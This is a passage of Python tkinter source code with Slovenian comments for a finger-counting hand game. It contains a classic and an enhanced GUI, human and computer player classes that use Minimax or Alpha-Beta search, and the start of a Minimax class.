tk.Menu(menu) menu.add_cascade(label="Možnosti", menu=menu_options) menu_options.add_command(label="Spremeni grafični vmesnik", command=lambda:select_gui(self.master, self)) menu_options.add_command(label="Help", command=self.help) # Nastavimo igralca na človek, da lahko v izbira_igre lažje # kličemo prekini_igralce. self.igralec_1 = Clovek(self) self.igralec_2 = Clovek(self) self.izbira_igre() def izbira_igre(self): """Uporabniku damo možnost, da se odloči za število rok in prstov ter izbor igralcev.""" self.prekini_igralce() # Konstante za širino Entry-ja in Button-a. WDTH_BUTTON = 20 WDTH_ENTRY = 5 self.new_frame() # Spremenljivke za OptionMenu. self.option1 = tk.StringVar(self.main) self.option2 = tk.StringVar(self.main) self.option1.set("Človek") self.option2.set("Minimax") # Ustvarimo labele, entryje, gumbe... label_hello = tk.Label(self.main, text="Hello human, please select who the players shall be!") label_roke = tk.Label(self.main, text="ROKE: ") self.entry_roke = tk.Entry(self.main, width=WDTH_ENTRY) label_prsti = tk.Label(self.main, text="PRSTI: ") self.entry_prsti = tk.Entry(self.main, width=WDTH_ENTRY) self.optionmenu_igralec1 = tk.OptionMenu(self.main, self.option1, "Človek", "Minimax", "Minimax++", "Alpha-Beta") self.optionmenu_igralec2 = tk.OptionMenu(self.main, self.option2, "Človek", "Minimax", "Minimax++", "Alpha-Beta") label_igralec1 = tk.Label(self.main, text="Igralec 1") label_igralec2 = tk.Label(self.main, text="Igralec 2") button_zacni = tk.Button(self.main, text="Začni igro!", command=self.preberi_igralce) # Gridamo labele, entryje, gumbe... label_hello.grid(row=0, columnspan=2) label_roke.grid(row=1, column=0, sticky='e') self.entry_roke.grid(row=1, column=1, sticky='w') self.entry_roke.insert(0, "2") label_prsti.grid(row=2, column=0, sticky='e') self.entry_prsti.grid(row=2, column=1, sticky='w') self.entry_prsti.insert(0, "5") label_igralec1.grid(row=3, column=0, sticky='e') label_igralec2.grid(row=3, column=1, sticky='w') self.optionmenu_igralec1.grid(row=4, column=0, sticky='e') self.optionmenu_igralec2.grid(row=4, column=1, sticky='w') button_zacni.grid(row=5, columnspan=2) def preberi_igralce(self): """Metoda, ki prebere izbrane igralce in začne igro.""" # Dobimo izbiri. option1 = self.option1.get() option2 = self.option2.get() if option1 == "Človek": if option2 == "Človek": self.zacni_igro(Clovek(self), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Clovek(self), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Clovek(self), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Clovek(self), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Minimax": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Minimax++": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Alpha-Beta": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) def zacni_igro(self, igralec1, igralec2): """ Metoda, ki začne igro, torej nastavi izbrane razrede igralcev in uvodni UI.""" # Preberemo število rok in prstov. Če število rok ni int, # ali ne ustreza določenim zahtevam, vrnemo None. try: self.roke = int(self.entry_roke.get()) if self.roke <= 0: return except: return try: self.prsti = int(self.entry_prsti.get()) if self.prsti <= 1: return except: return # Ustvarimo objekte igralcev. self.igralec_1 = igralec1 self.igralec_2 = igralec2 # Začnemo igro. self.igra = Igra(self.prsti, self.roke) # Nastavimo UI za igro. self.setup_ui() def setup_ui(self): """Metoda (na novo) vzpostavi celotno igralno desko in jo nastavi na izbrano pozicijo.""" self.new_frame() # Ustvarimo spremenljivke za RadioButton-e. self.variable_igralca1 = tk.IntVar() self.variable_igralca1.set(None) self.variable_igralca2 = tk.IntVar() self.variable_igralca2.set(None) # Ustvarimo seznam RadioButtonov in ga nastavimo na trenutno pozicijo. self.seznam_radiobutton = [[None for _ in range(self.roke)],[None for _ in range(self.roke)]] for i in range(self.roke): self.seznam_radiobutton[IGRALEC_1][i] = tk.Radiobutton(self.main, text=self.igra.position[IGRALEC_1][i], variable=self.variable_igralca1, value=i) self.seznam_radiobutton[IGRALEC_2][i] = tk.Radiobutton(self.main, text=self.igra.position[IGRALEC_2][i], variable=self.variable_igralca2, value=i) # Če je število prstov na roki 0, onemogočimo gumb, ki predstavlja to roko. if self.igra.position[IGRALEC_1][i] == 0: self.seznam_radiobutton[IGRALEC_1][i].config(state="disabled") if self.igra.position[IGRALEC_2][i] == 0: self.seznam_radiobutton[IGRALEC_2][i].config(state="disabled") self.seznam_radiobutton[IGRALEC_1][i].grid(row=i+1, column=0) self.seznam_radiobutton[IGRALEC_2][i].grid(row=i+1, column=2) # Če je na potezi človek, potrebuje gumb za napad. if (self.igra.na_potezi == IGRALEC_1 and isinstance(self.igralec_1, Clovek))\ or (self.igra.na_potezi == IGRALEC_2 and isinstance(self.igralec_2, Clovek)): button_move = tk.Button(self.main, text="NAPAD!", command=self.preberi_potezo) button_move.grid(row=0, column=2) try: self.label_na_potezi.destroy() except: pass # Preverimo, ali je konec igre, remi. if self.igra.je_konec(): self.label_na_potezi = tk.Label(self.main, text="KONEC IGRE!\nZmagal je igralec {}".format(nasprotnik(self.igra.na_potezi)+1)) self.label_na_potezi.grid(row=self.roke+1, columnspan=3) elif self.igra.je_remi(): self.label_na_potezi = tk.Label(self.main, text="KONEC IGRE!\nPrvič ponovljeno, na pol izgubljeno.") self.label_na_potezi.grid(row=self.roke+1, columnspan=3) else: self.label_na_potezi = tk.Label(self.main, text="Na potezi je Igralec {}".format(self.igra.na_potezi+1)) self.label_na_potezi.grid(row=self.roke+1, columnspan=3) # Preverimo veljavnost delitve. Če je na voljo, se pojavi gumb razdeli. self.igra.je_veljavna_delitev() if self.igra.moznost_delitve: button_delitev = tk.Button(self.main, text="Razdeli", command=self.naredi_delitev) button_delitev.grid(row=0, column=1) # Če imamo kaj zgodovine, lahko ponudimo možnost razveljavitve poteze. if self.igra.history != []: self.button_razveljavi = tk.Button(self.main, text="Undo", command=self.razveljavi) self.button_razveljavi.grid(row=0, column=0) # Prisilimo igralca, da igra. Potrebno le za računalnik # (metoda igraj pri cloveku passa). if self.igra.na_potezi == IGRALEC_1: self.igralec_1.igraj() elif self.igra.na_potezi == IGRALEC_2: self.igralec_2.igraj() def preberi_potezo(self): """Preberemo in ponastavimo vrednosti spremenljivk ter naredimo potezo.""" roka_igralca1 = self.variable_igralca1.get() roka_igralca2 = self.variable_igralca2.get() self.variable_igralca1.set(None) self.variable_igralca2.set(None) self.naredi_potezo(roka_igralca1, roka_igralca2) def naredi_potezo(self, roka_igralca1, roka_igralca2): """Metoda, ki opravi potezo. Pri tem mora preveriti veljavnost poteze, spremeniti self.igra.position.""" # Preverimo, ali je igralec izbral obe roki. if roka_igralca1 != None and roka_igralca2 != None: if self.igra.na_potezi == IGRALEC_1: # Opravimo potezo self.igra.opravi_potezo(roka_igralca1, roka_igralca2) self.setup_ui() else: # Opravimo potezo self.igra.opravi_potezo(roka_igralca2, roka_igralca1) self.setup_ui() def naredi_delitev(self): """Metoda, ki opravi delitev.""" self.igra.opravi_delitev() self.setup_ui() def razveljavi(self): """Metoda, ki razveljavi potezo.""" self.igra.razveljavi_potezo() self.setup_ui() def prekini_igralce(self): """Metoda, ki prekine igralce. Potrebno le za računalnik (pri človeku passa).""" if self.igralec_1: self.igralec_1.prekini() if self.igralec_2: self.igralec_2.prekini() def new_frame(self): """Metoda, ki ustvari nov Frame in pred tem pobriše starega, če obstaja.""" try: self.main.destroy() except: pass finally: self.main = tk.Frame(self.master) self.main.grid() def pravila(self): """Metoda, ki napiše pravila igre.""" self.new_frame() f = open('README.md', 'r') pravila = f.read() f.close() tk.Label(self.main, text=pravila, justify='left').grid() def help(self): """Metoda, ki napiše nekaj namigov.""" self.new_frame() help = "Ko je možna delitev, se pojavi gumb, na katerega klikni, če želi opraviti delitev.\nZa razveljavitev poteze je prav tako na voljo gumb.\n\nNasvet: Za boljšo preglednost priporočamo uporabo klasičnega uporabniškega vmesnika za število prstov, ki presega 10." tk.Label(self.main, text=help, justify='left').grid() ####################################################################################### # # Razred NewGui # # Provides more enhanced GUI then class Gui # ####################################################################################### class NewGui(): # Definiramo konstante. OVAL_SIZE = 60 DIFF_MID = 100 DIFF_KROGCI = 10 def __init__(self, master): self.master = master # Naredimo menu. menu = tk.Menu(self.master) self.master.config(menu=menu) # Naredimo child menu Igra. menu_igra = tk.Menu(menu) menu.add_cascade(label="Igra", menu=menu_igra) menu_igra.add_command(label="Nova igra", command=self.izbira_igre) menu_igra.add_command(label="Pravila igre", command=self.pravila) menu_igra.add_separator() menu_igra.add_command(label="Izhod", command=self.master.destroy) # Naredimo child menu Možnosti. menu_options = tk.Menu(menu) menu.add_cascade(label="Možnosti", menu=menu_options) menu_options.add_command(label="Spremeni grafični vmesnik", command=lambda:select_gui(self.master, self)) menu_options.add_command(label="Help", command=self.help) # Nastavimo igralca na človek, da lahko v izbira_igre lažje # kličemo prekini_igralce. self.igralec_1 = Clovek(self) self.igralec_2 = Clovek(self) self.izbira_igre() def izbira_igre(self): """Uporabniku damo možnost, da se odloči za število rok in prstov ter izbor igralcev.""" self.prekini_igralce() # Konstante za širino Entry-ja in Button-a. WDTH_BUTTON = 20 WDTH_ENTRY = 5 self.new_frame() # Spremenljivke za OptionMenu. self.option1 = tk.StringVar(self.main) self.option2 = tk.StringVar(self.main) self.option1.set("Človek") self.option2.set("Človek") # Ustvarimo labele, entryje, gumbe... label_hello = tk.Label(self.main, text="Hello human, please select who the players shall be!") label_roke = tk.Label(self.main, text="ROKE: ") self.entry_roke = tk.Entry(self.main, width=WDTH_ENTRY) label_prsti = tk.Label(self.main, text="PRSTI: ") self.entry_prsti = tk.Entry(self.main, width=WDTH_ENTRY) self.optionmenu_igralec1 = tk.OptionMenu(self.main, self.option1, "Človek", "Minimax", "Minimax++", "Alpha-Beta") self.optionmenu_igralec2 = tk.OptionMenu(self.main, self.option2, "Človek", "Minimax", "Minimax++", "Alpha-Beta") label_igralec1 = tk.Label(self.main, text="Igralec 1") label_igralec2 = tk.Label(self.main, text="Igralec 2") button_zacni = tk.Button(self.main, text="Začni igro!", command=self.preberi_igralce) # Gridamo labele, entryje, gumbe... label_hello.grid(row=0, columnspan=2) label_roke.grid(row=1, column=0, sticky='e') self.entry_roke.grid(row=1, column=1, sticky='w') self.entry_roke.insert(0, "2") label_prsti.grid(row=2, column=0, sticky='e') self.entry_prsti.grid(row=2, column=1, sticky='w') self.entry_prsti.insert(0, "5") label_igralec1.grid(row=3, column=0, sticky='e') label_igralec2.grid(row=3, column=1, sticky='w') self.optionmenu_igralec1.grid(row=4, column=0, sticky='e') self.optionmenu_igralec2.grid(row=4, column=1, sticky='w') button_zacni.grid(row=5, columnspan=2) def preberi_igralce(self): """Metoda, ki prebere izbrane igralce in začne igro.""" # Dobimo izbiri. option1 = self.option1.get() option2 = self.option2.get() if option1 == "Človek": if option2 == "Človek": self.zacni_igro(Clovek(self), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Clovek(self), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Clovek(self), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Clovek(self), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Minimax": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Minimax++": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Alpha-Beta": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) def zacni_igro(self, igralec1, igralec2): """ Metoda, ki začne igro, torej nastavi izbrane igralce in uvodni UI.""" # Preberemo število rok in prstov. Če število rok ni int, # ali ne ustreza določenim zahtevam, vrnemo None. try: self.roke = int(self.entry_roke.get()) if self.roke <= 0: return except: return try: self.prsti = int(self.entry_prsti.get()) if self.prsti <= 1: return except: return # Ustvarimo objekte igralcev. self.igralec_1 = igralec1 self.igralec_2 = igralec2 # Začnemo igro self.igra = Igra(self.prsti, self.roke) # Nastavimo UI za igro self.setup_ui() def setup_ui(self): """Metoda (na novo) vzpostavi celotno igralno desko in jo nastavi na izbrano pozicijo.""" self.new_frame() # S tem bomo preverjali, ali lahko že opravimo potezo. self.potrebno_opraviti = [None, None] # Nastavimo dimenzije Canvasa. self.WDTH_CANVAS = 2 * self.prsti * (NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) + NewGui.DIFF_MID self.HGHT_CANVAS = self.roke * (NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) # Ustvarimo igralno desko. self.igralna_deska = tk.Canvas(self.main, width=self.WDTH_CANVAS, height=self.HGHT_CANVAS) self.igralna_deska.grid() # Bindamo tipkovnico na igralna_deska. self.igralna_deska.focus_set() # Če je na potezi človek, bindamo gumbe, sicer ne. if (self.igra.na_potezi == IGRALEC_1 and isinstance(self.igralec_1, Clovek))\ or (self.igra.na_potezi == IGRALEC_2 and isinstance(self.igralec_2, Clovek)): self.igralna_deska.bind("<Button-1>", self.deska_klik) self.igralna_deska.bind("<Button-3>", self.naredi_delitev) self.igralna_deska.bind("<BackSpace>", self.razveljavi) # Za vsak prst na vsaki roki naredimo krogec. for roka in range(self.roke): x = NewGui.DIFF_KROGCI y = roka * (NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) + NewGui.DIFF_KROGCI//2 self.seznam_krogci = [[[None for _ in range(self.prsti)] for _ in range(self.roke)], [[None for _ in range(self.prsti)] for _ in range(self.roke)]] for prst in range(self.prsti): if self.igra.position[IGRALEC_1][roka] == 0: self.seznam_krogci[IGRALEC_1][roka][prst] = self.igralna_deska.create_oval(x, y, x+NewGui.OVAL_SIZE, y+NewGui.OVAL_SIZE, outline='grey', dash=(5,), fill="") elif prst < self.igra.position[IGRALEC_1][roka]: self.seznam_krogci[IGRALEC_1][roka][prst] = self.igralna_deska.create_oval(x, y, x+NewGui.OVAL_SIZE, y+NewGui.OVAL_SIZE, outline='red', fill='red') else: self.seznam_krogci[IGRALEC_1][roka][prst] = self.igralna_deska.create_oval(x, y, x+NewGui.OVAL_SIZE, y+NewGui.OVAL_SIZE, outline='red') if self.igra.position[IGRALEC_2][roka] == 0: self.seznam_krogci[IGRALEC_2][roka][prst] = self.igralna_deska.create_oval(self.WDTH_CANVAS-x-NewGui.OVAL_SIZE, y, self.WDTH_CANVAS-x, y+NewGui.OVAL_SIZE, outline='grey', dash=(5,), fill="") elif prst < self.igra.position[IGRALEC_2][roka]: self.seznam_krogci[IGRALEC_2][roka][prst] = self.igralna_deska.create_oval(self.WDTH_CANVAS-x-NewGui.OVAL_SIZE, y, self.WDTH_CANVAS-x, y+NewGui.OVAL_SIZE, outline='green', fill='green') else: self.seznam_krogci[IGRALEC_2][roka][prst] = self.igralna_deska.create_oval(self.WDTH_CANVAS-x-NewGui.OVAL_SIZE, y, self.WDTH_CANVAS-x, y+NewGui.OVAL_SIZE, outline='green') x += NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI for roka in range(self.roke): for prst in range(self.prsti): print(self.seznam_krogci[IGRALEC_1][roka][prst]) print(self.seznam_krogci[IGRALEC_2][roka][prst]) print("\n") try: self.napis.destroy() except: pass # Preverimo, ali je konec igre, remi. if self.igra.je_konec(): if self.igra.na_potezi == IGRALEC_1: self.napis = tk.Label(self.main, text="KONEC IGRE!\nZmagal je ZELENI.") elif self.igra.na_potezi == IGRALEC_2: self.napis = tk.Label(self.main, text="KONEC IGRE!\nZmagal je RDECI.") self.igralna_deska.unbind("<Button-1>") self.igralna_deska.unbind("<Button-3>") self.igralna_deska.unbind("<BackSpace") self.prekini_igralce() elif self.igra.je_remi(): self.napis = tk.Label(self.main, text="KONEC IGRE!\nPrvic ponovljeno, na pol izgubljeno.") self.igralna_deska.unbind("<Button-1>") self.igralna_deska.unbind("<Button-3>") self.igralna_deska.unbind("<BackSpace") self.prekini_igralce() else: if self.igra.na_potezi == IGRALEC_1: self.napis = tk.Label(self.main, text="Na potezi je RDECI.") elif self.igra.na_potezi == IGRALEC_2: self.napis = tk.Label(self.main, text="Na potezi je ZELENI.") if self.igra.na_potezi == IGRALEC_1: self.igralec_1.igraj() elif self.igra.na_potezi == IGRALEC_2: self.igralec_2.igraj() self.napis.grid() def prekini_igralce(self): """Metoda, ki prekine igralce. Potrebno le za računalnik (pri človeku passa).""" if self.igralec_1: self.igralec_1.prekini() if self.igralec_2: self.igralec_2.prekini() def deska_klik(self, event): """Metoda posrednik med klikom in preraunavanjem poteze. Skrbi le za shranitev koordinat, da lahko ob kliku kličemo funkcijo brez 'lambda:...'.""" x = event.x y = event.y self.preracunaj_potezo((x,y)) def preracunaj_potezo(self, p): """Metoda, ki na podlagi koordinat klika določi, katero roko smo izbrali. Če smo izbrali že svojo in nasprotnikovo roko, opravi potezo. Tu je v pomoč seznam potrebno_opraviti.""" (x,y) = p igralec = None # Po x koordinati določimo, ali gre za roko igralca 1 ali igralca 2. if x < (NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) * self.prsti: igralec = IGRALEC_1 elif x > self.WDTH_CANVAS - (NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) * self.prsti: igralec = IGRALEC_2 if igralec != None: tmp = self.potrebno_opraviti[igralec] print(tmp) roka = (int(y) - NewGui.DIFF_KROGCI//2)//(NewGui.OVAL_SIZE + NewGui.DIFF_KROGCI) self.potrebno_opraviti[igralec] = roka if tmp != None and tmp != roka: for prst in range(self.prsti): if self.igra.na_potezi == IGRALEC_1: if prst < self.igra.position[IGRALEC_1][tmp]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][tmp][prst], fill="red", outline="red") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][tmp][prst], outline="red") else: if prst < self.igra.position[IGRALEC_2][tmp]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][tmp][prst], fill="green", outline="green") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][tmp][prst], outline="green") for prst in range(self.prsti): if prst < self.igra.position[igralec][roka]: self.igralna_deska.itemconfig(self.seznam_krogci[igralec][roka][prst], fill="blue", outline="blue") else: self.igralna_deska.itemconfig(self.seznam_krogci[igralec][roka][prst], outline="blue") # Če sta izbrani obe roki, opravimo potezo in spremenimo barvo krogcev. if self.potrebno_opraviti[IGRALEC_1] != None and self.potrebno_opraviti[IGRALEC_2] != None: for prst in range(self.prsti): if prst < self.igra.position[IGRALEC_1][roka]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka][prst], fill="red", outline="red") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka][prst], outline="red") if prst < self.igra.position[IGRALEC_2][roka]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka][prst], fill="green", outline="green") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka][prst], outline="green") if self.igra.je_veljavna_poteza(self.potrebno_opraviti[IGRALEC_1], self.potrebno_opraviti[IGRALEC_2]): self.naredi_potezo(self.potrebno_opraviti[IGRALEC_1], self.potrebno_opraviti[IGRALEC_2]) def naredi_potezo(self, roka_igralca1, roka_igralca2): """Metoda, ki naredi potezo.""" if self.igra.na_potezi == IGRALEC_1: self.igra.opravi_potezo(roka_igralca1, roka_igralca2) for prst in range(self.prsti): if self.igra.position[IGRALEC_2][roka_igralca2] == 0: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka_igralca2][prst], fill="", outline='grey', dash=(5,)) print("Uniči roko") elif prst < self.igra.position[IGRALEC_2][roka_igralca2]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka_igralca2][prst], fill='green', outline='green') print("Barvaj zeleno") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka_igralca2][prst], fill="", outline='green') print("Prazen zelen") elif self.igra.na_potezi == IGRALEC_2: self.igra.opravi_potezo(roka_igralca2, roka_igralca1) for prst in range(self.prsti): if self.igra.position[IGRALEC_1][roka_igralca1] == 0: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka_igralca1][prst], fill="", outline='grey', dash=(5,)) print("Uniči roko") elif prst < self.igra.position[IGRALEC_1][roka_igralca1]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka_igralca1][prst], fill='red', outline='red') print("Barvaj rdeče") else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka_igralca1][prst], fill="", outline='red') print("Prazen rdeč") self.igralna_deska.update_idletasks() self.potrebno_opraviti = [None, None] if (self.igra.na_potezi == IGRALEC_1 and isinstance(self.igralec_1, Clovek))\ or (self.igra.na_potezi == IGRALEC_2 and isinstance(self.igralec_2, Clovek)): self.igralna_deska.bind("<Button-1>", self.deska_klik) self.igralna_deska.bind("<Button-3>", self.naredi_delitev) self.igralna_deska.bind("<BackSpace>", self.razveljavi) else: self.igralna_deska.unbind("<Button-1>") self.igralna_deska.unbind("<Button-3>") self.igralna_deska.unbind("<BackSpace>") try: self.napis.destroy() except: pass # Preverimo, ali je konec igre, remi. if self.igra.je_konec(): if self.igra.na_potezi == IGRALEC_1: self.napis = tk.Label(self.main, text="KONEC IGRE!\nZmagal je ZELENI.") elif self.igra.na_potezi == IGRALEC_2: self.napis = tk.Label(self.main, text="KONEC IGRE!\nZmagal je RDECI.") self.igralna_deska.unbind("<Button-1>") self.igralna_deska.unbind("<Button-3>") self.igralna_deska.unbind("<BackSpace") self.prekini_igralce() elif self.igra.je_remi(): self.napis = tk.Label(self.main, text="KONEC IGRE!\nPrvic ponovljeno, na pol izgubljeno.") self.igralna_deska.unbind("<Button-1>") self.igralna_deska.unbind("<Button-3>") self.igralna_deska.unbind("<BackSpace") self.prekini_igralce() else: if self.igra.na_potezi == IGRALEC_1: self.napis = tk.Label(self.main, text="Na potezi je RDECI.") elif self.igra.na_potezi == IGRALEC_2: self.napis = tk.Label(self.main, text="Na potezi je ZELENI.") if self.igra.na_potezi == IGRALEC_1: self.igralec_1.igraj() elif self.igra.na_potezi == IGRALEC_2: self.igralec_2.igraj() self.napis.grid() def naredi_delitev(self, event=None): """Metoda, ki naredi delitev.""" self.igra.je_veljavna_delitev() if self.igra.moznost_delitve: self.igra.opravi_delitev() for roka in range(self.roke): for prst in range(self.prsti): if self.igra.na_potezi == IGRALEC_1: if prst < self.igra.position[IGRALEC_1][roka]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka][prst], fill='red', outline='red', dash=()) else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_1][roka][prst], fill="", outline='red', dash=()) elif self.igra.na_potezi == IGRALEC_2: if prst < self.igra.position[IGRALEC_2][roka]: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka][prst], fill='green', outline='green', dash=()) else: self.igralna_deska.itemconfig(self.seznam_krogci[IGRALEC_2][roka][prst], fill="", outline='green', dash=()) def razveljavi(self, event): """Metoda, ki razveljavi potezo. Seveda lahko to stori le človek, zato preverimo, ali je na potezi človek.""" if self.igra.history != []: if self.igra.na_potezi == IGRALEC_1 and isinstance(self.igralec_1, Clovek): if isinstance(self.igralec_2, Racunalnik) and self.igra.history[len(self.igra.history)-1][1] != IGRALEC_1: self.igra.razveljavi_potezo() self.igra.razveljavi_potezo() self.setup_ui() elif self.igra.na_potezi == IGRALEC_2 and isinstance(self.igralec_2, Clovek): if isinstance(self.igralec_1, Racunalnik) and self.igra.history[len(self.igra.history)-1][1] != IGRALEC_2: self.igra.razveljavi_potezo() self.igra.razveljavi_potezo() self.setup_ui() def new_frame(self): """Metoda, ki ustvari nov Frame in pred tem pobriše starega, če obstaja.""" try: self.main.destroy() except: pass finally: self.main = tk.Frame(self.master) self.main.grid() def pravila(self): """Metoda, ki napiše pravila igre.""" self.new_frame() f = open('README.md', 'r') pravila = f.read() f.close() tk.Label(self.main, text=pravila, justify='left').grid() def help(self): """Metoda, ki napiše nekaj namigov.""" help = "Za delitev pritisni desni miškin gumb.\nZa razveljavitev poteze pritisni povratnico.\n\nNasvet: Za boljšo preglednost priporočamo uporabo klasičnega uporabniškega vmesnika za število prstov, ki presega 10." tk.Label(self.main, text=help, justify='left').grid() tk.Button(self.main, text="Nova igra", command=self.izbira_igre).grid() ################################################################################################## # # Razred Clovek # ################################################################################################## class Clovek(): def __init__(self, gui): self.gui = gui def igraj(self): # Človeka ne rabimo siliti k opravljanju potez. pass def prekini(self): # Človeka ne rabimo prekiniti; on se sam prekine. pass def klik(self, p): # Ob kliku preračunamo potezo. self.gui.preracunaj_potezo() ################################################################################################## # # Razred Racunalnik # # Razred, ki skrbi za vse v zvezi z računalnikom in komunikacijo z izbranim algoritmom. # ################################################################################################## class Racunalnik(): def __init__(self, gui, algoritem): # Zapomnimo si gui in nastavimo izbran algoritem. self.gui = gui self.algoritem = algoritem self.mislec = None def igraj(self): """Metoda, ki prisili algoritem, da izračuna potezo.""" self.mislec = threading.Thread(target=lambda:self.algoritem.izracunaj_potezo(self.gui.igra.kopija())) self.mislec.start() # Čez 100ms preverimo, ali že imamo potezo. self.gui.main.after(100, self.preveri_potezo) def preveri_potezo(self): """Metoda, ki preveri, ali že imamo potezo. Če jo imamo, jo opravimo, drugače se spet pokličemo.""" if self.algoritem.poteza is not None: if self.algoritem.poteza[0]: self.gui.naredi_delitev() if self.gui.igra.na_potezi == IGRALEC_1: try: self.gui.naredi_potezo(self.algoritem.poteza[1], self.algoritem.poteza[2]) except: pass else: try: self.gui.naredi_potezo(self.algoritem.poteza[2], self.algoritem.poteza[1]) except: pass # Ker smo našli potezo, misleca ne rabimo več. self.mislec = None else: self.gui.main.after(100, self.preveri_potezo) def prekini(self): """Metoda, ki prekine misleca, če smo to zahtevali.""" if self.mislec: self.algoritem.prekini() self.mislec.join() self.mislec = None def klik(self, p): # Se ne odzivamo na klike, ko razmišljamo. pass ################################################################################################## # # Razred Minimax # # Računalnik računa svoje poteze z algoritmom Minimax # ################################################################################################## class Minimax(): def __init__(self, 